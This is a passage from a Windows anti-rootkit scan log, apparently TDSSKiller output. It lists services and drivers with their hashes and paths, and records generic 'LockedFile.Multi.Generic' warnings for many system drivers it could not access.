23:23:42.0298 0x18fc  cdrom - ok
23:23:42.0348 0x18fc  [ 312E2F82AF11E79906898AC3E3D58A1F, F6CB7D8B204B94F749D5DBEFD552150AAB16A34D629F87F73823A7504465F106 ] CertPropSvc     C:\Windows\System32\certprop.dll
23:23:42.0368 0x18fc  CertPropSvc - ok
23:23:42.0648 0x18fc  [ 1BF0745142C07A6967C6DB7DEBFF6B16, 50C60F59CC1FE6EFF4E79A0A2545B14FF4851881C9262D6CFA6EE0ECF027D1D6 ] cFosSpeed       C:\Windows\system32\DRIVERS\cfosspeed6.sys
23:23:42.0648 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\cfosspeed6.sys. md5: 1BF0745142C07A6967C6DB7DEBFF6B16, sha256: 50C60F59CC1FE6EFF4E79A0A2545B14FF4851881C9262D6CFA6EE0ECF027D1D6
23:23:42.0648 0x18fc  cFosSpeed - detected LockedFile.Multi.Generic ( 1 )
23:23:42.0648 0x18fc  cFosSpeed ( LockedFile.Multi.Generic ) - warning
23:23:42.0648 0x18fc  Force sending object to P2P due to detect: cFosSpeed
23:23:42.0658 0x18fc  Object send P2P result: false
23:23:42.0848 0x18fc  [ 49C58338E9572E2570E2C636A3CDAA42, 9E2271B008EABD1263507A4185FE0CFDE84C65A659DF350EF000325FA0340B66 ] cFosSpeedS      C:\Program Files\ASRock\XFast LAN\spd.exe
23:23:42.0868 0x18fc  cFosSpeedS - ok
23:23:42.0898 0x18fc  [ D7CD5C4E1B71FA62050515314CFB52CF, 513B5A849899F379F0BC6AB3A8A05C3493C2393C95F036612B96EC6E252E1C64 ] circlass        C:\Windows\system32\DRIVERS\circlass.sys
23:23:42.0898 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\circlass.sys. md5: D7CD5C4E1B71FA62050515314CFB52CF, sha256: 513B5A849899F379F0BC6AB3A8A05C3493C2393C95F036612B96EC6E252E1C64
23:23:42.0898 0x18fc  circlass - detected LockedFile.Multi.Generic ( 1 )
23:23:42.0898 0x18fc  Object is SCO, delete is not allowed
23:23:42.0898 0x18fc  circlass ( LockedFile.Multi.Generic ) - warning
23:23:42.0898 0x18fc  Force sending object to P2P due to detect: circlass
23:23:42.0898 0x18fc  Object send P2P result: false
23:23:42.0988 0x18fc  [ FE1EC06F2253F691FE36217C592A0206, B9F122DB5E665ECDF29A5CB8BB6B531236F31A54A95769D6C5C1924C87FE70CE ] CLFS            C:\Windows\system32\CLFS.sys
23:23:42.0988 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\CLFS.sys. md5: FE1EC06F2253F691FE36217C592A0206, sha256: B9F122DB5E665ECDF29A5CB8BB6B531236F31A54A95769D6C5C1924C87FE70CE
23:23:42.0988 0x18fc  CLFS - detected LockedFile.Multi.Generic ( 1 )
23:23:42.0988 0x18fc  Object is SCO, delete is not allowed
23:23:42.0988 0x18fc  CLFS ( LockedFile.Multi.Generic ) - warning
23:23:43.0198 0x18fc  [ D88040F816FDA31C3B466F0FA0918F29, 39D3630E623DA25B8444B6D3AAAB16B98E7E289C5619E19A85D47B74C71449F3 ] clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
23:23:43.0218 0x18fc  clr_optimization_v2.0.50727_32 - ok
23:23:43.0478 0x18fc  [ D1CEEA2B47CB998321C579651CE3E4F8, 654013B8FD229A50017B08DEC6CA19C7DDA8CE0771260E057A92625201D539B1 ] clr_optimization_v2.0.50727_64 C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
23:23:43.0498 0x18fc  clr_optimization_v2.0.50727_64 - ok
23:23:44.0050 0x18fc  [ 397C2677C25CBE213F3270245A401624, 8121E37108DE7A0402DC5111EBF452F91893B63EECE3AAD9EACF61C40D3FC182 ] clr_optimization_v4.0.30319_32 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
23:23:44.0492 0x18fc  clr_optimization_v4.0.30319_32 - ok
23:23:44.0522 0x18fc  [ 29139759FCC4E4E0531ABE2EA82CE646, CFF7B2F4A9B37D343BE18DC40161DC03FA9DB308CAE9E0B3DF1FCDC3EBAC0C08 ] clr_optimization_v4.0.30319_64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
23:23:44.0862 0x18fc  clr_optimization_v4.0.30319_64 - ok
23:23:44.0912 0x18fc  [ 0840155D0BDDF1190F84A663C284BD33, 696039FA63CFEB33487FAA8FD7BBDB220141E9C6E529355D768DFC87999A9C3A ] CmBatt          C:\Windows\system32\DRIVERS\CmBatt.sys
23:23:44.0982 0x18fc  CmBatt - ok
23:23:45.0082 0x18fc  [ E19D3F095812725D88F9001985B94EDD, 46243C5CCC4981CAC6FA6452FFCEC33329BF172448F1852D52592C9342E0E18B ] cmdide          C:\Windows\system32\DRIVERS\cmdide.sys
23:23:45.0092 0x18fc  cmdide - ok
23:23:45.0202 0x18fc  [ F95FD4CB7DA00BA2A63CE9F6B5C053E1, D1FBCA0416D38B9CA510FB01CF251E60B244D38080E6668948ED927D2350ED49 ] CNG             C:\Windows\system32\Drivers\cng.sys
23:23:45.0262 0x18fc  CNG - ok
23:23:45.0282 0x18fc  [ 102DE219C3F61415F964C88E9085AD14, CD74CB703381F1382C32CF892FF2F908F4C9412E1BC77234F8FEA5D4666E1BF1 ] Compbatt        C:\Windows\system32\DRIVERS\compbatt.sys
23:23:45.0282 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\compbatt.sys. md5: 102DE219C3F61415F964C88E9085AD14, sha256: CD74CB703381F1382C32CF892FF2F908F4C9412E1BC77234F8FEA5D4666E1BF1
23:23:45.0282 0x18fc  Compbatt - detected LockedFile.Multi.Generic ( 1 )
23:23:45.0282 0x18fc  Object is SCO, delete is not allowed
23:23:45.0282 0x18fc  Compbatt ( LockedFile.Multi.Generic ) - warning
23:23:45.0282 0x18fc  Force sending object to P2P due to detect: Compbatt
23:23:45.0282 0x18fc  Object send P2P result: false
23:23:45.0332 0x18fc  [ F26B3A86F6FA87CA360B879581AB4123, 723904362614FE47F6CC0EA0656BA1B47EA32D73BAFB61688A5E5CAE4340B1BF ] CompositeBus    C:\Windows\system32\DRIVERS\CompositeBus.sys
23:23:45.0332 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\CompositeBus.sys. md5: F26B3A86F6FA87CA360B879581AB4123, sha256: 723904362614FE47F6CC0EA0656BA1B47EA32D73BAFB61688A5E5CAE4340B1BF
23:23:45.0332 0x18fc  CompositeBus - detected LockedFile.Multi.Generic ( 1 )
23:23:45.0332 0x18fc  CompositeBus ( LockedFile.Multi.Generic ) - warning
23:23:45.0382 0x18fc  COMSysApp - ok
23:23:45.0412 0x18fc  [ 1C827878A998C18847245FE1F34EE597, 41EF7443D8B2733AA35CAC64B4F5F74FAC8BB0DA7D3936B69EC38E2DC3972E60 ] crcdisk         C:\Windows\system32\DRIVERS\crcdisk.sys
23:23:45.0412 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\crcdisk.sys. md5: 1C827878A998C18847245FE1F34EE597, sha256: 41EF7443D8B2733AA35CAC64B4F5F74FAC8BB0DA7D3936B69EC38E2DC3972E60
23:23:45.0412 0x18fc  crcdisk - detected LockedFile.Multi.Generic ( 1 )
23:23:45.0412 0x18fc  Object is SCO, delete is not allowed
23:23:45.0412 0x18fc  crcdisk ( LockedFile.Multi.Generic ) - warning
23:23:45.0552 0x18fc  [ 8C57411B66282C01533CB776F98AD384, 65BCF1B0BA521CBE39E974C7ACAEA9C9E3F89D86754275C6B2616E7691876AEE ] CryptSvc        C:\Windows\system32\cryptsvc.dll
23:23:45.0602 0x18fc  CryptSvc - ok
23:23:45.0762 0x18fc  [ A193FAE9BF40D981C3094252B17DE601, 585E9F48676DA26DBD30398E4D0E33378D25CB726EFA973E48B69F31C96A6E4E ] ctxusbm         C:\Windows\system32\DRIVERS\ctxusbm.sys
23:23:45.0762 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\ctxusbm.sys. md5: A193FAE9BF40D981C3094252B17DE601, sha256: 585E9F48676DA26DBD30398E4D0E33378D25CB726EFA973E48B69F31C96A6E4E
23:23:45.0762 0x18fc  ctxusbm - detected LockedFile.Multi.Generic ( 1 )
23:23:45.0762 0x18fc  ctxusbm ( LockedFile.Multi.Generic ) - warning
23:23:45.0762 0x18fc  Force sending object to P2P due to detect: ctxusbm
23:23:45.0762 0x18fc  Object send P2P result: false
23:23:45.0822 0x18fc  [ 7266972E86890E2B30C0C322E906B027, BFA30E85F5BD3AA933913BD7C6D2B5993DB7AFB0C98349B61A6BEF0BDC8A3680 ] DcomLaunch      C:\Windows\system32\rpcss.dll
23:23:45.0872 0x18fc  DcomLaunch - ok
23:23:45.0972 0x18fc  [ 3CEC7631A84943677AA8FA8EE5B6B43D, 32061DAC9ED6C1EBA3B367B18D0E965AEEC2DF635DCF794EC39D086D32503AC5 ] defragsvc       C:\Windows\System32\defragsvc.dll
23:23:46.0132 0x18fc  defragsvc - ok
23:23:46.0152 0x18fc  [ 3F1DC527070ACB87E40AFE46EF6DA749, 5CB9CB94854AF06BEA02AF3E0562B8ECF72B2B23ED657A3F5E17CD3552F3EF84 ] DfsC            C:\Windows\system32\Drivers\dfsc.sys
23:23:46.0152 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\Drivers\dfsc.sys. md5: 3F1DC527070ACB87E40AFE46EF6DA749, sha256: 5CB9CB94854AF06BEA02AF3E0562B8ECF72B2B23ED657A3F5E17CD3552F3EF84
23:23:46.0152 0x18fc  DfsC - detected LockedFile.Multi.Generic ( 1 )
23:23:46.0152 0x18fc  Object is SCO, delete is not allowed
23:23:46.0152 0x18fc  DfsC ( LockedFile.Multi.Generic ) - warning
23:23:46.0242 0x18fc  [ CE3B9562D997F69B330D181A8875960F, 6FEE6622859198C5C13545867EF7CFE8EDC991360E976F792313DAA9C82CC5C8 ] Dhcp            C:\Windows\system32\dhcpcore.dll
23:23:46.0502 0x18fc  Dhcp - ok
23:23:46.0532 0x18fc  [ 13096B05847EC78F0977F2C0F79E9AB3, 1E44981B684F3E56F5D2439BB7FA78BD1BC876BB2265AE089AEC68F241B05B26 ] discache        C:\Windows\system32\drivers\discache.sys
23:23:46.0532 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\discache.sys. md5: 13096B05847EC78F0977F2C0F79E9AB3, sha256: 1E44981B684F3E56F5D2439BB7FA78BD1BC876BB2265AE089AEC68F241B05B26
23:23:46.0532 0x18fc  discache - detected LockedFile.Multi.Generic ( 1 )
23:23:46.0532 0x18fc  discache ( LockedFile.Multi.Generic ) - warning
23:23:46.0532 0x18fc  Force sending object to P2P due to detect: discache
23:23:46.0532 0x18fc  Object send P2P result: false
23:23:46.0618 0x18fc  [ 9819EEE8B5EA3784EC4AF3B137A5244C, 571BC886E87C888DA96282E381A746D273B58B9074E84D4CA91275E26056D427 ] Disk            C:\Windows\system32\DRIVERS\disk.sys
23:23:46.0619 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\disk.sys. md5: 9819EEE8B5EA3784EC4AF3B137A5244C, sha256: 571BC886E87C888DA96282E381A746D273B58B9074E84D4CA91275E26056D427
23:23:46.0619 0x18fc  Disk - detected LockedFile.Multi.Generic ( 1 )
23:23:46.0619 0x18fc  Object is SCO, delete is not allowed
23:23:46.0619 0x18fc  Disk ( LockedFile.Multi.Generic ) - warning
23:23:46.0619 0x18fc  Force sending object to P2P due to detect: Disk
23:23:46.0620 0x18fc  Object send P2P result: false
23:23:47.0096 0x18fc  [ DBFA9E9842C434B84052F18074866191, 91CEFF197870FF556978E23888CB7B5FDA14699E88887B4C25AFFF74F130F95F ] DisplayFusionService C:\Program Files (x86)\DisplayFusion\DisplayFusionService.exe
23:23:47.0136 0x18fc  DisplayFusionService - ok
23:23:47.0218 0x18fc  [ 676108C4E3AA6F6B34633748BD0BEBD9, 953286126E482EF3A9A1833680EFF86D657BD6C5411B9AEC2D7828ADE63D25AD ] Dnscache        C:\Windows\System32\dnsrslvr.dll
23:23:47.0298 0x18fc  Dnscache - ok
23:23:47.0348 0x18fc  [ 14452ACDB09B70964C8C21BF80A13ACB, DA0AAAC04626EFF4256D7095FF1DDA1F1B17676E26990C418BDF5090476F2AB4 ] dot3svc         C:\Windows\System32\dot3svc.dll
23:23:47.0442 0x18fc  dot3svc - ok
23:23:47.0590 0x18fc  [ 8C2BA6BEA949EE6E68385F5692BAFB94, 1047F473DCE0FB56BEA5C1B7929752C1FBAB5983C8202ABB4EEA48FCD60A353A ] DPS             C:\Windows\system32\dps.dll
23:23:47.0658 0x18fc  DPS - ok
23:23:47.0718 0x18fc  [ 9B19F34400D24DF84C858A421C205754, 967AF267B4124BADA8F507CEBF25F2192D146A4D63BE71B45BFC03C5DA7F21A7 ] drmkaud         C:\Windows\system32\drivers\drmkaud.sys
23:23:47.0718 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\drmkaud.sys. md5: 9B19F34400D24DF84C858A421C205754, sha256: 967AF267B4124BADA8F507CEBF25F2192D146A4D63BE71B45BFC03C5DA7F21A7
23:23:47.0718 0x18fc  drmkaud - detected LockedFile.Multi.Generic ( 1 )
23:23:47.0718 0x18fc  drmkaud ( LockedFile.Multi.Generic ) - warning
23:23:47.0860 0x18fc  [ EBCE0B0924835F635F620D19F0529DCE, 15BF803765373264390879FCA86C6D89C92DAFD0B1A36DEFA78EF01EBA2F9C26 ] DXGKrnl         C:\Windows\System32\drivers\dxgkrnl.sys
23:23:47.0860 0x18fc  Suspicious file ( NoAccess ): C:\Windows\System32\drivers\dxgkrnl.sys. md5: EBCE0B0924835F635F620D19F0529DCE, sha256: 15BF803765373264390879FCA86C6D89C92DAFD0B1A36DEFA78EF01EBA2F9C26
23:23:47.0860 0x18fc  DXGKrnl - detected LockedFile.Multi.Generic ( 1 )
23:23:47.0860 0x18fc  Object is SCO, delete is not allowed
23:23:47.0860 0x18fc  DXGKrnl ( LockedFile.Multi.Generic ) - warning
23:23:47.0860 0x18fc  Force sending object to P2P due to detect: DXGKrnl
23:23:47.0860 0x18fc  Object send P2P result: false
23:23:47.0982 0x18fc  [ E2DDA8726DA9CB5B2C4000C9018A9633, 0C967DBC3636A76A696997192A158AA92A1AF19F01E3C66D5BF91818A8FAEA76 ] EapHost         C:\Windows\System32\eapsvc.dll
23:23:48.0051 0x18fc  EapHost - ok
23:23:48.0446 0x18fc  [ DC5D737F51BE844D8C82C695EB17372F, 6D4022D9A46EDE89CEF0FAEADCC94C903234DFC460C0180D24FF9E38E8853017 ] ebdrv           C:\Windows\system32\DRIVERS\evbda.sys
23:23:48.0446 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\evbda.sys. md5: DC5D737F51BE844D8C82C695EB17372F, sha256: 6D4022D9A46EDE89CEF0FAEADCC94C903234DFC460C0180D24FF9E38E8853017
23:23:48.0456 0x18fc  ebdrv - detected LockedFile.Multi.Generic ( 1 )
23:23:48.0456 0x18fc  ebdrv ( LockedFile.Multi.Generic ) - warning
23:23:48.0456 0x18fc  Force sending object to P2P due to detect: ebdrv
23:23:48.0466 0x18fc  Object send P2P result: false
23:23:48.0519 0x18fc  [ 0793F40B9B8A1BDD266296409DBD91EA, 8A383FC9A66A327905C340D06138980F9E489479535A2C2AAE5E8BB14A74826E ] EFS             C:\Windows\System32\lsass.exe
23:23:48.0532 0x18fc  EFS - ok
23:23:48.0728 0x18fc  [ 3D69FAE60EDE442E004611A4EE4DB44C, 480D3F7604C9A70570BBFFF3CA0FABA216805BB38D4F8A73BB50996B547D8017 ] ehRecvr         C:\Windows\ehome\ehRecvr.exe
23:23:48.0823 0x18fc  ehRecvr - ok
23:23:48.0850 0x18fc  [ 4705E8EF9934482C5BB488CE28AFC681, 359E9EC5693CE0BE89082E1D5D8F5C5439A5B985010FF0CB45C11E3CFE30637D ] ehSched         C:\Windows\ehome\ehsched.exe
23:23:48.0920 0x18fc  ehSched - ok
23:23:49.0030 0x18fc  [ 0E5DA5369A0FCAEA12456DD852545184, 9A64AC5396F978C3B92794EDCE84DCA938E4662868250F8C18FA7C2C172233F8 ] elxstor         C:\Windows\system32\DRIVERS\elxstor.sys
23:23:49.0030 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\elxstor.sys. md5: 0E5DA5369A0FCAEA12456DD852545184, sha256: 9A64AC5396F978C3B92794EDCE84DCA938E4662868250F8C18FA7C2C172233F8
23:23:49.0030 0x18fc  elxstor - detected LockedFile.Multi.Generic ( 1 )
23:23:49.0030 0x18fc  Object is SCO, delete is not allowed
23:23:49.0030 0x18fc  elxstor ( LockedFile.Multi.Generic ) - warning
23:23:49.0030 0x18fc  Force sending object to P2P due to detect: elxstor
23:23:49.0030 0x18fc  Object send P2P result: false
23:23:49.0070 0x18fc  [ 34A3C54752046E79A126E15C51DB409B, 7D5B5E150C7C73666F99CBAFF759029716C86F16B927E0078D77F8A696616D75 ] ErrDev          C:\Windows\system32\DRIVERS\errdev.sys
23:23:49.0070 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\errdev.sys. md5: 34A3C54752046E79A126E15C51DB409B, sha256: 7D5B5E150C7C73666F99CBAFF759029716C86F16B927E0078D77F8A696616D75
23:23:49.0070 0x18fc  ErrDev - detected LockedFile.Multi.Generic ( 1 )
23:23:49.0070 0x18fc  Object is SCO, delete is not allowed
23:23:49.0070 0x18fc  ErrDev ( LockedFile.Multi.Generic ) - warning
23:23:49.0260 0x18fc  [ 4166F82BE4D24938977DD1746BE9B8A0, 24121751B7306225AD1C808442D7B030DEF377E9316AA0A3C5C7460E87317881 ] EventSystem     C:\Windows\system32\es.dll
23:23:49.0310 0x18fc  EventSystem - ok
23:23:49.0330 0x18fc  [ A510C654EC00C1E9BDD91EEB3A59823B, 76CD277730F7B08D375770CD373D786160F34D1481AF0536BA1A5D2727E255F5 ] exfat           C:\Windows\system32\drivers\exfat.sys
23:23:49.0330 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\exfat.sys. md5: A510C654EC00C1E9BDD91EEB3A59823B, sha256: 76CD277730F7B08D375770CD373D786160F34D1481AF0536BA1A5D2727E255F5
23:23:49.0330 0x18fc  exfat - detected LockedFile.Multi.Generic ( 1 )
23:23:49.0330 0x18fc  Object is SCO, delete is not allowed
23:23:49.0330 0x18fc  exfat ( LockedFile.Multi.Generic ) - warning
23:23:49.0360 0x18fc  [ 0ADC83218B66A6DB380C330836F3E36D, 798D6F83B5DBCC1656595E0A96CF12087FCCBE19D1982890D0CE5F629B328B29 ] fastfat         C:\Windows\system32\drivers\fastfat.sys
23:23:49.0360 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\fastfat.sys. md5: 0ADC83218B66A6DB380C330836F3E36D, sha256: 798D6F83B5DBCC1656595E0A96CF12087FCCBE19D1982890D0CE5F629B328B29
23:23:49.0360 0x18fc  fastfat - detected LockedFile.Multi.Generic ( 1 )
23:23:49.0360 0x18fc  Object is SCO, delete is not allowed
23:23:49.0360 0x18fc  fastfat ( LockedFile.Multi.Generic ) - warning
23:23:49.0360 0x18fc  Force sending object to P2P due to detect: fastfat
23:23:49.0360 0x18fc  Object send P2P result: false
23:23:49.0582 0x18fc  [ D607B2F1BEE3992AA6C2C92C0A2F0855, E22301C8F01DBF0A38A85165959BB070647C996CB1BCD50FDFE3DDDCA427DF2A ] Fax             C:\Windows\system32\fxssvc.exe
23:23:49.0682 0x18fc  Fax - ok
23:23:49.0732 0x18fc  [ D765D19CD8EF61F650C384F62FAC00AB, 9F0A483A043D3BA873232AD3BA5F7BF9173832550A27AF3E8BD433905BD2A0EE ] fdc             C:\Windows\system32\DRIVERS\fdc.sys
23:23:49.0732 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\fdc.sys. md5: D765D19CD8EF61F650C384F62FAC00AB, sha256: 9F0A483A043D3BA873232AD3BA5F7BF9173832550A27AF3E8BD433905BD2A0EE
23:23:49.0732 0x18fc  fdc - detected LockedFile.Multi.Generic ( 1 )
23:23:49.0732 0x18fc  Object is SCO, delete is not allowed
23:23:49.0732 0x18fc  fdc ( LockedFile.Multi.Generic ) - warning
23:23:49.0732 0x18fc  Force sending object to P2P due to detect: fdc
23:23:49.0733 0x18fc  Object send P2P result: false
23:23:49.0826 0x18fc  [ 0438CAB2E03F4FB61455A7956026FE86, 6D4DDC2973DB25CE0C7646BC85EFBCC004EBE35EA683F62162AE317C6F1D8DFE ] fdPHost         C:\Windows\system32\fdPHost.dll
23:23:49.0876 0x18fc  fdPHost - ok
23:23:49.0933 0x18fc  [ 802496CB59A30349F9A6DD22D6947644, 52D59D3D628D5661F83F090F33F744F6916E0CC1F76E5A33983E06EB66AE19F8 ] FDResPub        C:\Windows\system32\fdrespub.dll
23:23:49.0964 0x18fc  FDResPub - ok
23:23:49.0982 0x18fc  [ 655661BE46B5F5F3FD454E2C3095B930, 549C8E2A2A37757E560D55FFA6BFDD838205F17E40561E67F0124C934272CD1A ] FileInfo        C:\Windows\system32\drivers\fileinfo.sys
23:23:49.0982 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\fileinfo.sys. md5: 655661BE46B5F5F3FD454E2C3095B930, sha256: 549C8E2A2A37757E560D55FFA6BFDD838205F17E40561E67F0124C934272CD1A
23:23:49.0983 0x18fc  FileInfo - detected LockedFile.Multi.Generic ( 1 )
23:23:49.0983 0x18fc  Object is SCO, delete is not allowed
23:23:49.0983 0x18fc  FileInfo ( LockedFile.Multi.Generic ) - warning
23:23:50.0007 0x18fc  [ 5F671AB5BC87EEA04EC38A6CD5962A47, 6B61D3363FF3F9C439BD51102C284972EAE96ACC0683B9DC7E12D25D0ADC51B6 ] Filetrace       C:\Windows\system32\drivers\filetrace.sys
23:23:50.0007 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\filetrace.sys. md5: 5F671AB5BC87EEA04EC38A6CD5962A47, sha256: 6B61D3363FF3F9C439BD51102C284972EAE96ACC0683B9DC7E12D25D0ADC51B6
23:23:50.0008 0x18fc  Filetrace - detected LockedFile.Multi.Generic ( 1 )
23:23:50.0008 0x18fc  Object is SCO, delete is not allowed
23:23:50.0008 0x18fc  Filetrace ( LockedFile.Multi.Generic ) - warning
23:23:50.0008 0x18fc  Force sending object to P2P due to detect: Filetrace
23:23:50.0009 0x18fc  Object send P2P result: false
23:23:50.0056 0x18fc  [ C172A0F53008EAEB8EA33FE10E177AF5, 9175A95B323696D1B35C9EFEB7790DD64E6EE0B7021E6C18E2F81009B169D77B ] flpydisk        C:\Windows\system32\DRIVERS\flpydisk.sys
23:23:50.0056 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\flpydisk.sys. md5: C172A0F53008EAEB8EA33FE10E177AF5, sha256: 9175A95B323696D1B35C9EFEB7790DD64E6EE0B7021E6C18E2F81009B169D77B
23:23:50.0056 0x18fc  flpydisk - detected LockedFile.Multi.Generic ( 1 )
23:23:50.0056 0x18fc  Object is SCO, delete is not allowed
23:23:50.0056 0x18fc  flpydisk ( LockedFile.Multi.Generic ) - warning
23:23:50.0056 0x18fc  Force sending object to P2P due to detect: flpydisk
23:23:50.0056 0x18fc  Object send P2P result: false
23:23:50.0216 0x18fc  [ F7866AF72ABBAF84B1FA5AA195378C59, 9D522044FE9C18FB3EC327E675737C01F2A8231DDE900421D3A431596946A7F8 ] FltMgr          C:\Windows\system32\drivers\fltmgr.sys
23:23:50.0216 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\fltmgr.sys. md5: F7866AF72ABBAF84B1FA5AA195378C59, sha256: 9D522044FE9C18FB3EC327E675737C01F2A8231DDE900421D3A431596946A7F8
23:23:50.0216 0x18fc  FltMgr - detected LockedFile.Multi.Generic ( 1 )
23:23:50.0216 0x18fc  Object is SCO, delete is not allowed
23:23:50.0216 0x18fc  FltMgr ( LockedFile.Multi.Generic ) - warning
23:23:50.0296 0x18fc  [ 508401A63E6B1CBF0B9C9A011498731F, F636B0A9C0EB6AE7EC04E5C5FD8A0578AEB76A1B0D974F355BCE6B6091901725 ] FNETTBOH_305    C:\Windows\system32\drivers\FNETTBOH_305.SYS
23:23:50.0296 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\FNETTBOH_305.SYS. md5: 508401A63E6B1CBF0B9C9A011498731F, sha256: F636B0A9C0EB6AE7EC04E5C5FD8A0578AEB76A1B0D974F355BCE6B6091901725
23:23:50.0306 0x18fc  FNETTBOH_305 - detected LockedFile.Multi.Generic ( 1 )
23:23:50.0306 0x18fc  FNETTBOH_305 ( LockedFile.Multi.Generic ) - warning
23:23:50.0316 0x18fc  [ E341178C116DAC6A3A764587E68DFA7B, 91B4C79057908A622666FF069CF1C7ECA42952A6587432F5E99E33E8B19D29AF ] FNETURPX        C:\Windows\system32\drivers\FNETURPX.SYS
23:23:50.0316 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\FNETURPX.SYS. md5: E341178C116DAC6A3A764587E68DFA7B, sha256: 91B4C79057908A622666FF069CF1C7ECA42952A6587432F5E99E33E8B19D29AF
23:23:50.0316 0x18fc  FNETURPX - detected LockedFile.Multi.Generic ( 1 )
23:23:50.0316 0x18fc  FNETURPX ( LockedFile.Multi.Generic ) - warning
23:23:50.0316 0x18fc  Force sending object to P2P due to detect: FNETURPX
23:23:50.0316 0x18fc  Object send P2P result: false
23:23:50.0446 0x18fc  [ 8AC4CB4EA61E41009FAE9AE7B2B5DA3A, 6587B22ED91F98D3E3614967F62D7A58F42C12F45F8E1D47835D195CD350BC54 ] FontCache       C:\Windows\system32\FntCache.dll
23:23:50.0526 0x18fc  FontCache - ok
23:23:50.0578 0x18fc  [ 8D89E3131C27FDD6932189CB785E1B7A, AC7DA4C5E6D2E41D1A1DE146E46F034FAF0FB11AD801F070F2D5CD08166E9EB7 ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
23:23:50.0588 0x18fc  FontCache3.0.0.0 - ok
23:23:50.0617 0x18fc  [ D43703496149971890703B4B1B723EAC, F06397B2EDCA61629249D2EF1CBB7827A8BEAB8488246BD85EF6AE1363C0DA6E ] FsDepends       C:\Windows\system32\drivers\FsDepends.sys
23:23:50.0617 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\FsDepends.sys. md5: D43703496149971890703B4B1B723EAC, sha256: F06397B2EDCA61629249D2EF1CBB7827A8BEAB8488246BD85EF6AE1363C0DA6E
23:23:50.0617 0x18fc  FsDepends - detected LockedFile.Multi.Generic ( 1 )
23:23:50.0618 0x18fc  FsDepends ( LockedFile.Multi.Generic ) - warning
23:23:50.0648 0x18fc  [ E95EF8547DE20CF0603557C0CF7A9462, 55540B06B7B380CA2DA6EEE2D76C6CD6131ADB02B2D0B172A36536863A0C57B6 ] Fs_Rec          C:\Windows\system32\drivers\Fs_Rec.sys
23:23:50.0648 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\Fs_Rec.sys. md5: E95EF8547DE20CF0603557C0CF7A9462, sha256: 55540B06B7B380CA2DA6EEE2D76C6CD6131ADB02B2D0B172A36536863A0C57B6
23:23:50.0648 0x18fc  Fs_Rec - detected LockedFile.Multi.Generic ( 1 )
23:23:50.0648 0x18fc  Object is SCO, delete is not allowed
23:23:50.0648 0x18fc  Fs_Rec ( LockedFile.Multi.Generic ) - warning
23:23:50.0710 0x18fc  [ AE87BA80D0EC3B57126ED2CDC15B24ED, 7E0EA3CDB78054D9A4E3B5142305943F2914536D80B8FC363414C8838D51D56C ] fvevol          C:\Windows\system32\DRIVERS\fvevol.sys
23:23:50.0710 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\fvevol.sys. md5: AE87BA80D0EC3B57126ED2CDC15B24ED, sha256: 7E0EA3CDB78054D9A4E3B5142305943F2914536D80B8FC363414C8838D51D56C
23:23:50.0710 0x18fc  fvevol - detected LockedFile.Multi.Generic ( 1 )
23:23:50.0710 0x18fc  Object is SCO, delete is not allowed
23:23:50.0710 0x18fc  fvevol ( LockedFile.Multi.Generic ) - warning
23:23:50.0710 0x18fc  Force sending object to P2P due to detect: fvevol
23:23:50.0720 0x18fc  Object send P2P result: false
23:23:50.0750 0x18fc  [ 8C778D335C9D272CFD3298AB02ABE3B6, 85F0B13926B0F693FA9E70AA58DE47100E4B6F893772EBE4300C37D9A36E6005 ] gagp30kx        C:\Windows\system32\DRIVERS\gagp30kx.sys
23:23:50.0750 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\gagp30kx.sys. md5: 8C778D335C9D272CFD3298AB02ABE3B6, sha256: 85F0B13926B0F693FA9E70AA58DE47100E4B6F893772EBE4300C37D9A36E6005
23:23:50.0750 0x18fc  gagp30kx - detected LockedFile.Multi.Generic ( 1 )
23:23:50.0750 0x18fc  Object is SCO, delete is not allowed
23:23:50.0750 0x18fc  gagp30kx ( LockedFile.Multi.Generic ) - warning
23:23:50.0820 0x18fc  [ 8E98D21EE06192492A5671A6144D092F, B8F656B34D361EA5AFB47F3A67AB2221580DADA59C8CD0CB83181E4AD8B562B4 ] GEARAspiWDM     C:\Windows\system32\DRIVERS\GEARAspiWDM.sys
23:23:50.0820 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\GEARAspiWDM.sys. md5: 8E98D21EE06192492A5671A6144D092F, sha256: B8F656B34D361EA5AFB47F3A67AB2221580DADA59C8CD0CB83181E4AD8B562B4
